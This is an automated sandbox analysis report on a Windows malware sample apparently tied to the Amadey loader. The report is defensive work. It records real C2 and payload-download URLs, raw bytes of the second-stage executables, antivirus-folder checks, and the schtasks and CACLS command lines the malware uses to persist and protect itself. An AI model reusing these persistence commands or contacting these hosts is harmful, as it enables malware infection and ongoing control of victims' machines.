popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

update-pyt.exe

Generic Malware Malicious Library Antivirus UPX PE File OS Processor Check PE32 JPEG Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us March 27, 2023, 10:18 a.m. March 27, 2023, 10:20 a.m.
Size 13.3MB
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 ba6a75f0c69a7f22b526ad940c3451b4
SHA256 f9065a3e8905c4433fb9df4dbff6a8c6645cfb12291dcdc1a3e7148f46e2762e
CRC32 C6656742
ssdeep 393216:Ow1YoG53jQu7j/ZFztE4Fg1EFoK2Er/QG7fal7a:OsYtTjC4Fg1s2Erlf
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • Generic_Malware_Zero - Generic Malware
  • Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 78.46.242.112:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 79.137.248.23:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 79.137.248.23:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2014819 ET INFO Packed Executable Download Misc activity
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3
192.168.56.103:49185
172.217.24.68:443 		None None None
TLS 1.3
192.168.56.103:49184
172.217.24.68:443 		None None None
TLS 1.3
192.168.56.103:49187
142.251.220.3:443 		None None None
TLS 1.3
192.168.56.103:49182
142.251.220.3:443 		None None None
TLS 1.3
192.168.56.103:49188
142.251.220.45:443 		None None None
TLS 1.3
192.168.56.103:49186
172.217.24.68:443 		None None None
TLS 1.3
192.168.56.103:49194
172.217.27.35:443 		None None None
TLS 1.3
192.168.56.103:49199
142.250.204.142:443 		None None None
TLS 1.3
192.168.56.103:49200
216.58.200.227:443 		None None None
TLS 1.3
192.168.56.103:49201
142.250.204.65:443 		None None None
TLS 1.3
192.168.56.103:49202
172.217.24.238:443 		None None None
TLS 1.3
192.168.56.103:49183
142.251.220.45:443 		None None None
TLS 1.3
192.168.56.103:49189
172.217.24.68:443 		None None None
TLS 1.3
192.168.56.103:49193
142.250.66.138:443 		None None None
TLS 1.3
192.168.56.103:49198
142.250.204.67:443 		None None None
TLS 1.3
192.168.56.103:49190
34.120.48.173:443 		None None None
TLS 1.3
192.168.56.103:49195
172.217.27.35:443 		None None None
UNDETERMINED
192.168.56.103:49196
172.217.27.35:443 		None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section rdata0
section rdata1
section rdata2
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://78.46.242.112/so57Nst/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://78.46.242.112/so57Nst/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.137.248.23/RedHat.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://91.107.196.27/75e7ead3c17835de.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.137.248.23/Lamb.pif.exe
request POST http://78.46.242.112/so57Nst/index.php
request POST http://78.46.242.112/so57Nst/index.php?scr=1
request GET http://79.137.248.23/RedHat.exe
request POST http://91.107.196.27/75e7ead3c17835de.php
request GET http://79.137.248.23/Lamb.pif.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://clients2.google.com/time/1/current?cup2key=4:1168666890&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
request GET http://www.gstatic.com/generate_204
request POST http://78.46.242.112/so57Nst/index.php
request POST http://78.46.242.112/so57Nst/index.php?scr=1
request POST http://91.107.196.27/75e7ead3c17835de.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1820
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 12288
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0124d000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1820
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 1820
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x013d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 12288
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x013bd000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2056
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 2056
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x011a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01490000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3060
region_size: 2260992
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 3060
region_size: 2260992
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c70000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 57344
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2356
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 12288
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0154d000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2356
region_size: 385024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 2356
region_size: 385024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x011e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\1000092001\Lamb.exe
file C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
file C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000092001\Lamb.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000092001\Lamb.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL fdà/ æ΃¬§@pÑHü¥ h¿‘ð`ÑÍðÐh\J‘z$.text äæ`P`.dataüê@0À.rdataì×Øì@P@.eh_fram çðèÄ@0@.bss¼à€`À.idatað¬@0À.CRT@È@0À.tls Ê@0À.rdata0>ÜZ0ÞZÌ `.rdata1Ðzªy@À.rdata28W z8W²y `.rsrcÍ`ÑêÐ@@óÍ´&¼'ƒì1Àf=@MZÇLå^ÇHå^ÇDå^Çàá^th£à^¡Xå^…ÀtJÇ$èV©Ç$ÿÿÿÿè2®‹hå^£œå^£ å^¡@÷^‰è«ƒ=äTtm1ÀƒÄÍ´&Ç$è ©ë´f‹<@º@PEŠ@u€·Qfú t?fú …jÿÿÿƒ¹„†]ÿÿÿ‹‘ø1À…Ò•ÀéKÿÿÿvÇ$ ¾Sè­1ÀƒÄÃyt†,ÿÿÿ‹‰è1À…É•Àéÿÿÿfƒì,¡@å^ÇD$à^ÇD$à^ÇD$à^Ç$à^£à^¡ìT‰D$ èV¨ƒÄ,ÃfU1À¹‰åWVU¤S‰×ƒì|ó«¸0èo¹)čD$ƒàðÇÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌÌÇ@ ÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌ̃äð‹5Xå^…ö…Žd¡1ö‹X‹=Èõ^ë9ÄÇ$èÿ׃ì‰ðð±¤å^…ÀuÞ¡¨å^1ۃø„þ¡¨å^…À„MÇà^¡¨å^ƒø„ó…Û„¡¸åX…ÀtÇD$ÇD$Ç$ÿЃì èÒ­Ç$ ÃSÿÄõ^ƒì£lå^Ç$@èA§èÜ«¡,÷^Ç”å^@‹…Àt[1Éëv„Òt,ƒát'¹ƒÀ¶€ú ~ç‰Ëƒó€ú"DËëèv¼'„Òuëv¼'€ú  ƒÀ¶„Òuñ£˜å^‹Xå^…ÛtöEи fEEÔ·À£T¡à^‰E‰Æ…‰EŒ‰$覅ö‰E”‹=à^ŽC1ۉþ‹ž‰$踥x‰<$è奋M”‰™‹ žƒÃ‰|$‰$‰L$è¹¥9]uɋEŒƒè‹u”lj5à^詧¡÷^‹à^‰¡à^‰D$¡à^‰D$¡à^‰$èí%‹ à^£ à^…É„µ‹à^…Òu 裥¡ à^eô[^_]á¨å^»ƒø…þÿÿÇ$襡¨å^ƒø… þÿÿÇD$ _Ç$_èM¥…ÛǨå^…ïýÿÿ‡¤å^éäýÿÿ‰$ÿ(õ^ƒìéaýÿÿǨå^ÇD$_Ç$_è¥éšýÿÿ1Àé÷þÿÿ‰$èŤ¶¼'ƒì ÇXå^è蟎 é–üÿÿ¶ƒì ÇXå^讦ƒÄ évüÿÿU‰åƒì ÈðXà^‰ $‰D$è²TƒÄ]Ãf.„U‰åƒì ÈðXà^‰ $‰D$èÒVƒÄ]ÃffffffU‰å]éGXfffU‰å‹E‹U ]ÃDU‰å‹E‹U ]ÃDU‰å‹E‹U ]ÃDU‰åSWV‹U ‹u‹}‹‹O9Öt‹D¶^ÿNˆ@9Öuó‰^_[]ÃffffffU‰åÿU]ÃffffU‰å‹E‹M ‹U‰‰H‰P]ÃfffffU‰å]éWí€U‰å‹E‹]ÃfDU‰å‹E‹]ÃfffU‰åSWV‹U ‹u‹}‹‹O9Öt‹D¶^ÿNˆ@9Öuó‰^_[]Ãf.„fU‰å‹E‹U ]ÃffU‰å]éÇÅ fffU‰å‹MAƒ9t‹]ÃPè¸ìƒÄ]ÃfU‰åSWV‹U ‹u‹}‹‹O9Öt‹D¶^ÿNˆ@9Öuó‰^_[]Ãf.„fU‰å‹E‹M ‹+Q‰Ç@‰P]Ã@U‰å‹E‹U ]ÃffU‰åVP‹E ‹M‹U‰Uø‹UuøRQPhTVè{• ƒÄ^]ÃDU‰åƒì(‹Eÿ0èpþÿÿƒÄ…Àtl‰Eø‰UüEø‰EðÇEôà:@ÇEà TÇEäÇE؍Eð‰EèÇEìEØPèÛD ƒÄ‹EüÿuøÿƒÄ‹Eü‹H…ÉtÿpQÿuøè7#ƒÄ ¸ë1ÀƒÄ(]ÃfDU‰åƒì(‹Eÿ0èàýÿÿƒÄ…Àtl‰Eø‰UüEø‰EðÇEôà:@ÇEà TÇEäÇE؍Eð‰EèÇEìEØPèKD ƒÄ‹EüÿuøÿƒÄ‹Eü‹H…ÉtÿpQÿuøè§"ƒÄ ¸ë1ÀƒÄ(]ÃfDU‰å]ÃfffffU‰åƒì(‹E…Àto‹M ‰Eø‰MüEø‰EðÇEôà:@ÇEà TÇEäÇE؍Eð‰EèÇEìEØPè²C ƒÄ‹EüÿuøÿƒÄ‹Eü‹H…ÉtÿpQÿuøè"ƒÄ ¸ë1ÀƒÄ(]ÃffffffU‰åSWVƒì‹E‹x‹pVÿu èe)ƒÄ‰Eì‰UðEìPèó9ƒÄ]ØPjSè”åƒÄ EäÿuðÿuìÿuàÿuÜVWÿu Pèw)ƒÄ €}ä‹Eèt+‹Mä€ùt#‹u‰F‰NÇSèníƒÄSè%½ƒÄë#PSèåƒÄ‹Eà‹u‰F òEØòFÇ‹}Wè4íƒÄWè뼃ĉðƒÄ^_[]ÃfffffffU‰åWV‹u€>u4‹~‹Gÿ7ÿƒÄ‹G‹H…ÉtÿpQÿ7èá ƒÄ jj ÿvèÒ ƒÄ ^_]Ãf.„U‰åV‹uƒÆVè°ìƒÄVèg¼ƒÄ^]ÐU‰åSWVƒì‰U؉MäÇEèÇEìÇEð1Àƒ}•À‰Eྮùad1À뀸ŠˆBI1Ɓþ­ùadŽ}þ®ùadtåþé“~|…¾¸ …zڃ}„¯‰uÜ1ÿ‹uàë‹Eì‹MðˆÿEðw;}sz‰ø1Ò÷u‹E ¶‹EØ28‰÷‹Eð;EèuÎPEèPèd¹ƒÄë¿f.„Dþ$q#-uE}èWè¿ëƒÄWèv»ƒÄÇEèÇEìÇEð¸Íâ]Q1Æé9ÿÿÿ‹uܸ …zÚ1Æé*ÿÿÿþã¦t1Æéÿÿÿ‹Mð‹Eä‰H òEèò@ǃÄ^_[]ÃU‰åSWVƒäøìD$TPèçË ƒÄjjèƒÄ…À„1Ç §Ç@§¦/Ç@
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL zµdà/ è’&{¬€@€Ø9Z ”‰©ð°ÖDÊþ×p&ô£À$=MYCLtLD€æè`P`8uSxWUy5üì@0ÀUgMTkb-g¬Ò Ô î@P@$hpj638x(çðèÂ@0@b#+@I;)e¼à$€`ÀKAf`a_(Xð$ª$@0ÀLS0&wof1@%Æ$@0ÀF>?*mUav %È$@0ÀtlhmKye`©„Z0%†ZÊ$ `cGghv*c8ÐÀP@Àt>e:DuJPpÙVÐÚVX `Fm"luw6fDÊ°ÖÌ2Ö@@óÍ´&¼'ƒì1Àf=@MZÇLådÇHådÇDådÇàádth£àd¡Xåd…ÀtJÇ$趫Ç$ÿÿÿÿ蒰‹håd£œåd£ åd¡@÷d‰èf­ƒ=äTtm1ÀƒÄÍ´&Ç$èl«ë´f‹<@º@PEŠ@u€·Qfú t?fú …jÿÿÿƒ¹„†]ÿÿÿ‹‘ø1À…Ò•ÀéKÿÿÿvÇ$€ÀSèd¯1ÀƒÄÃyt†,ÿÿÿ‹‰è1À…É•Àéÿÿÿfƒì,¡@ådÇD$àdÇD$àdÇD$àdÇ$àd£àd¡ìT‰D$ 趪ƒÄ,ÃfU1À¹‰åWVU¤S‰×ƒì|ó«¸0èÏ»)čD$ƒàðÇÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌÌÇ@ ÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌÌÇ@ÌÌÌ̃äð‹5Xåd…ö…Žd¡1ö‹X‹=Èõdë9ÄÇ$èÿ׃ì‰ðð±¤åd…ÀuÞ¡¨åd1ۃø„þ¡¨åd…À„MÇàd¡¨ådƒø„ó…Û„¡xà^…ÀtÇD$ÇD$Ç$ÿЃì è2°Ç$€ÅSÿÄõdƒì£lådÇ$@è¡©è<®¡,÷dÇ”åd@‹…Àt[1Éëv„Òt,ƒát'¹ƒÀ¶€ú ~ç‰Ëƒó€ú"DËëèv¼'„Òuëv¼'€ú  ƒÀ¶„Òuñ£˜åd‹Xåd…ÛtöEи fEEÔ·À£T¡àd‰E‰Æ…‰EŒ‰$èp¨…ö‰E”‹=àdŽC1ۉþ‹ž‰$訍x‰<$èE¨‹M”‰™‹ žƒÃ‰|$‰$‰L$è¨9]uɋEŒƒè‹u”lj5àdè ª¡÷d‹àd‰¡àd‰D$¡àd‰D$¡àd‰$èM(‹ àd£ àd…É„µ‹àd…Òu 訡 àdeô[^_]á¨åd»ƒø…þÿÿÇ$èߧ¡¨ådƒø… þÿÿÇD$ eÇ$eè­§…ÛǨåd…ïýÿÿ‡¤ådéäýÿÿ‰$ÿ(õdƒìéaýÿÿǨådÇD$eÇ$eèa§éšýÿÿ1Àé÷þÿÿ‰$è%§¶¼'‹ŒE&%–3Ëèìƒh‹ŒLªô̵d$ Ͷƒì ÇXådè©ƒÄ évüÿÿU‰åƒì Èð^àd‰ $‰D$èWƒÄ]Ãf.„U‰åƒì Èð^àd‰ $‰D$è2YƒÄ]ÃffffffU‰å]é§ZfffU‰å‹E‹U ]ÃDU‰å‹E‹U ]ÃDU‰å‹E‹U ]ÃDU‰åSWV‹U ‹u‹}‹‹O9Öt‹D¶^ÿNˆ@9Öuó‰^_[]ÃffffffU‰åÿU]ÃffffU‰å‹E‹M ‹U‰‰H‰P]ÃfffffU‰å]é·ï€U‰å‹E‹]ÃfDU‰å‹E‹]ÃfffU‰åSWV‹U ‹u‹}‹‹O9Öt‹D¶^ÿNˆ@9Öuó‰^_[]Ãf.„fU‰å‹E‹U ]ÃffU‰å]é'È fffU‰å‹MAƒ9t‹]ÃPèïƒÄ]ÃfU‰åSWV‹U ‹u‹}‹‹O9Öt‹D¶^ÿNˆ@9Öuó‰^_[]Ãf.„fU‰å‹E‹M ‹+Q‰Ç@‰P]Ã@U‰å‹E‹U ]ÃffU‰åVP‹E ‹M‹U‰Uø‹UuøRQPhTVèۗ ƒÄ^]ÃDU‰åƒì(‹Eÿ0èpþÿÿƒÄ…Àtl‰Eø‰UüEø‰EðÇEô@=@ÇEà TÇEäÇE؍Eð‰EèÇEìEØPè;G ƒÄ‹EüÿuøÿƒÄ‹Eü‹H…ÉtÿpQÿuøè—%ƒÄ ¸ë1ÀƒÄ(]ÃfDU‰åƒì(‹Eÿ0èàýÿÿƒÄ…Àtl‰Eø‰UüEø‰EðÇEô@=@ÇEà TÇEäÇE؍Eð‰EèÇEìEØPè«F ƒÄ‹EüÿuøÿƒÄ‹Eü‹H…ÉtÿpQÿuøè%ƒÄ ¸ë1ÀƒÄ(]ÃfDU‰å]ÃfffffU‰åƒì(‹E…Àto‹M ‰Eø‰MüEø‰EðÇEô@=@ÇEà TÇEäÇE؍Eð‰EèÇEìEØPèF ƒÄ‹EüÿuøÿƒÄ‹Eü‹H…ÉtÿpQÿuøèn$ƒÄ ¸ë1ÀƒÄ(]ÃffffffU‰åSWVƒì‹E‹x‹pVÿu èÅ+ƒÄ‰Eì‰UðEìPèS<ƒÄ]ØPjSèôçƒÄ EäÿuðÿuìÿuàÿuÜVWÿu Pè×+ƒÄ €}ä‹Eèt+‹Mä€ùt#‹u‰F‰NÇSèÎïƒÄS腿ƒÄë#PSèyçƒÄ‹Eà‹u‰F òEØòFÇ‹}Wè”ïƒÄWèK¿ƒÄ‰ðƒÄ^_[]ÃfffffffU‰åWV‹u€>u4‹~‹Gÿ7ÿƒÄ‹G‹H…ÉtÿpQÿ7èA#ƒÄ jj ÿvè2#ƒÄ ^_]Ãf.„U‰å]Ãf.„U‰åV‹uƒÆVèïƒÄVè·¾ƒÄ^]ÐU‰åSWVƒì‰U؉MäÇEèÇEìÇEð1Àƒ}•À‰Eà¾`8"A1ÀëþC '„ë1ƁþB 'QþvÁ‰tiþiìuæ}èWèˆîƒÄWè?¾ƒÄÇEèÇEìÇEð¸\e1Æëµf.„@þ`8"Au‘¸ 6¿­1Æë–f.„D¸5柃}„vÿÿÿ‰uÜ1ÿ‹uà뀋Eì‹MðˆÿEðw;}s-‰ø1Ò÷u‹E ¶‹EØ28‰÷‹Eð;EèuÎPEèPèT»ƒÄ뿋uܸ5æŸ1Æéÿÿÿ‹Mð‹Eä‰H òEèò@ǃÄ^_[]Ãf.„DU‰åSWVƒäøìD$Pè'Î ƒÄjj
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00081600', u'virtual_address': u'0x00141000', u'entropy': 7.274767342002277, u'name': u'.rdata', u'virtual_size': u'0x0008151c'} entropy 7.274767342 description A section with a high entropy has been found
section {u'size_of_data': u'0x00001c00', u'virtual_address': u'0x00223000', u'entropy': 7.005823451001572, u'name': u'.idata', u'virtual_size': u'0x00001a14'} entropy 7.005823451 description A section with a high entropy has been found
section {u'size_of_data': u'0x005aa400', u'virtual_address': u'0x00227000', u'entropy': 7.931736759904774, u'name': u'rdata0', u'virtual_size': u'0x005aa2ca'} entropy 7.9317367599 description A section with a high entropy has been found
section {u'size_of_data': u'0x0056fc00', u'virtual_address': u'0x007d3000', u'entropy': 7.942228359505709, u'name': u'rdata2', u'virtual_size': u'0x0056fba0'} entropy 7.94222835951 description A section with a high entropy has been found
entropy 0.876091200413 description Overall entropy of this PE file is high
cmdline C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline "C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
host 78.46.242.112
host 79.137.248.23
host 91.107.196.27
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline CACLS "..\fd369298e4" /P "test22:R" /E
